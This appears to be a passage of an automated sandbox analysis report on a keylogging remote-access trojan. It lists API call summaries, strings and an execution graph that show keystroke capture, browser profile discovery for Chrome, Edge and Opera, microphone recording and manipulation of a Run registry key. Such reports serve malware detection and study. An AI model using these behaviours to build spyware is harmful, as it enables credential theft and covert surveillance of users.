                                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                • String ID: Online Keylogger Stopped
                                                                • API String ID: 1623830855-1496645233
                                                                • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                • String ID: Unknown exception
                                                                • API String ID: 3476068407-410509341
                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                APIs
                                                                • waveInPrepareHeader.WINMM(013D07B0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                • waveInAddBuffer.WINMM(013D07B0,00000020,?,00000000,00401A15), ref: 0040185F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferHeaderPrepare
                                                                • String ID: XMG
                                                                • API String ID: 2315374483-813777761
                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                APIs
                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocaleValid
                                                                • String ID: IsValidLocaleName$kKD
                                                                • API String ID: 1901932003-3269126172
                                                                • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                • API String ID: 1174141254-4188645398
                                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                • API String ID: 1174141254-2800177040
                                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                • API String ID: 1174141254-1629609700
                                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                APIs
                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                • String ID: [AltL]$[AltR]
                                                                • API String ID: 2738857842-2658077756
                                                                • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: !D@$open
                                                                • API String ID: 587946157-1586967515
                                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                APIs
                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State
                                                                • String ID: [CtrlL]$[CtrlR]
                                                                • API String ID: 1649606143-2446555240
                                                                • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 1881088180-2015055088
                                                                • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 2654517830-1051519024
                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                APIs
                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteDirectoryFileRemove
                                                                • String ID: pth_unenc
                                                                • API String ID: 3325800564-4028850238
                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                APIs
                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                • String ID: pth_unenc
                                                                • API String ID: 1872346434-4028850238
                                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 1717984340-0
                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastRead
                                                                • String ID:
                                                                • API String ID: 4100373531-0
                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                Execution Graph

                                                                Execution Coverage: 6.4%
                                                                Dynamic/Decrypted Code Coverage: 9.2%
                                                                Signature Coverage: 0%
                                                                Total number of Nodes: 2000
                                                                Total number of Limit Nodes: 81
444c1f 38601->38334 38602 4449b9 42 API calls 38604 444b4b 38602->38604 38603 444c15 38605 4449b9 42 API calls 38603->38605 38604->38603 39229 444972 GetVersionExW 38604->39229 38605->38601 38607 444b99 memcmp 38612 444b8c 38607->38612 38608 444c0b 39233 444a85 42 API calls 38608->39233 38612->38607 38612->38608 39230 444aa5 42 API calls 38612->39230 39231 40a7a0 GetVersionExW 38612->39231 39232 444a85 42 API calls 38612->39232 38615 40399d 38614->38615 39234 403a16 38615->39234 38617 403a09 39248 40b1ab free free 38617->39248 38619 4039a3 38619->38617 38623 4039f4 38619->38623 39245 40a02c CreateFileW 38619->39245 38620 403a12 wcsrchr 38620->38341 38623->38617 38624 4099c6 2 API calls 38623->38624 38624->38617 38626 414c2e 15 API calls 38625->38626 38627 404048 38626->38627 38628 414c2e 15 API calls 38627->38628 38629 404056 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 404073 38630->38631 38632 409d1f 6 API calls 38631->38632 38633 40408e 38632->38633 38634 409d1f 6 API calls 38633->38634 38635 4040a6 38634->38635 38636 403af5 20 API calls 38635->38636 38637 4040ba 38636->38637 38638 403af5 20 API calls 38637->38638 38639 4040cb 38638->38639 39275 40414f memset 38639->39275 38641 4040e0 38642 404140 38641->38642 38644 4040ec memset 38641->38644 38646 4099c6 2 API calls 38641->38646 38647 40a8ab 9 API calls 38641->38647 39289 40b1ab free free 38642->39289 38644->38641 38645 404148 38645->38401 38646->38641 38647->38641 39302 40a6e6 WideCharToMultiByte 38648->39302 38650 4087ed 39303 4095d9 memset 38650->39303 38653 408809 memset memset memset memset memset 38654 40b2cc 27 API calls 38653->38654 38655 4088a1 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 4088b1 38656->38657 38658 40b2cc 27 API calls 38657->38658 38659 4088c0 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 4088d0 38660->38661 38662 40b2cc 27 API calls 38661->38662 38663 4088df 38662->38663 38664 409d1f 6 API calls 38663->38664 38665 4088ef 38664->38665 38666 40b2cc 27 
API calls 38665->38666 38667 4088fe 38666->38667 38668 409d1f 6 API calls 38667->38668 38669 40890e 38668->38669 38670 40b2cc 27 API calls 38669->38670 38671 40891d 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 40892d 38672->38673 39322 409b98 GetFileAttributesW 38673->39322 38675 40893e 38698 408953 38698->38401 38700 40b633 free 38699->38700 38701 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38700->38701 38702 413f00 Process32NextW 38701->38702 38703 413da5 OpenProcess 38702->38703 38704 413f17 CloseHandle 38702->38704 38705 413df3 memset 38703->38705 38708 413eb0 38703->38708 38704->38444 39614 413f27 38705->39614 38707 413ebf free 38707->38708 38708->38702 38708->38707 38709 4099f4 3 API calls 38708->38709 38709->38708 38711 413e37 GetModuleHandleW 38712 413e1f 38711->38712 38713 413e46 GetProcAddress 38711->38713 38712->38711 39619 413959 38712->39619 39635 413ca4 38712->39635 38713->38712 38715 413ea2 CloseHandle 38715->38708 38717 414c2e 15 API calls 38716->38717 38718 403eb7 38717->38718 38719 414c2e 15 API calls 38718->38719 38720 403ec5 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 403ee2 38721->38722 38723 409d1f 6 API calls 38722->38723 38724 403efd 38723->38724 38725 409d1f 6 API calls 38724->38725 38726 403f15 38725->38726 38727 403af5 20 API calls 38726->38727 38728 403f29 38727->38728 38729 403af5 20 API calls 38728->38729 38730 403f3a 38729->38730 38731 40414f 33 API calls 38730->38731 38732 403f4f 38731->38732 38733 403faf 38732->38733 38735 403f5b memset 38732->38735 38737 4099c6 2 API calls 38732->38737 38738 40a8ab 9 API calls 38732->38738 39649 40b1ab free free 38733->39649 38735->38732 38736 403fb7 38736->38383 38737->38732 38738->38732 38740 414c2e 15 API calls 38739->38740 38741 403d26 38740->38741 38742 414c2e 15 API calls 38741->38742 38743 403d34 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403d51 38744->38745 38746 409d1f 6 API calls 38745->38746 38747 403d6c 38746->38747 38748 409d1f 6 API 
calls 38747->38748 38749 403d84 38748->38749 38750 403af5 20 API calls 38749->38750 38751 403d98 38750->38751 38752 403af5 20 API calls 38751->38752 38753 403da9 38752->38753 38754 40414f 33 API calls 38753->38754 38760 403dbe 38754->38760 38755 403e1e 39650 40b1ab free free 38755->39650 38756 403dca memset 38756->38760 38758 403e26 38758->38398 38759 4099c6 2 API calls 38759->38760 38760->38755 38760->38756 38760->38759 38761 40a8ab 9 API calls 38760->38761 38761->38760 38763 414b81 9 API calls 38762->38763 38764 414c40 38763->38764 38765 414c73 memset 38764->38765 39651 409cea 38764->39651 38766 414c94 38765->38766 39654 414592 RegOpenKeyExW 38766->39654 38770 414c64 38770->38377 38771 414cc1 38772 414cf4 wcscpy 38771->38772 39655 414bb0 wcscpy 38771->39655 38772->38770 38774 414cd2 39656 4145ac RegQueryValueExW 38774->39656 38776 414ce9 38776->38772 38778 409d43 wcscpy 38777->38778 38780 409d62 38777->38780 38779 409719 2 API calls 38778->38779 38781 409d51 wcscat 38779->38781 38780->38421 38781->38780 38783 40aebe FindClose 38782->38783 38784 40ae21 38783->38784 38785 4099c6 2 API calls 38784->38785 38786 40ae35 38785->38786 38787 409d1f 6 API calls 38786->38787 38788 40ae49 38787->38788 38788->38461 38790 40ade0 38789->38790 38791 40ae0f 38789->38791 38790->38791 38792 40ade7 wcscmp 38790->38792 38791->38461 38792->38791 38793 40adfe wcscmp 38792->38793 38793->38791 38795 40ae18 9 API calls 38794->38795 38797 4453c4 38795->38797 38796 40ae51 9 API calls 38796->38797 38797->38796 38798 4453f3 38797->38798 38799 40add4 2 API calls 38797->38799 38802 445403 250 API calls 38797->38802 38800 40aebe FindClose 38798->38800 38799->38797 38801 4453fe 38800->38801 38801->38461 38802->38797 38804 40ae7b FindNextFileW 38803->38804 38805 40ae5c FindFirstFileW 38803->38805 38806 40ae94 38804->38806 38807 40ae8f 38804->38807 38805->38806 38809 40aeb6 38806->38809 38810 409d1f 6 API calls 38806->38810 38808 40aebe FindClose 38807->38808 38808->38806 38809->38461 38810->38809 
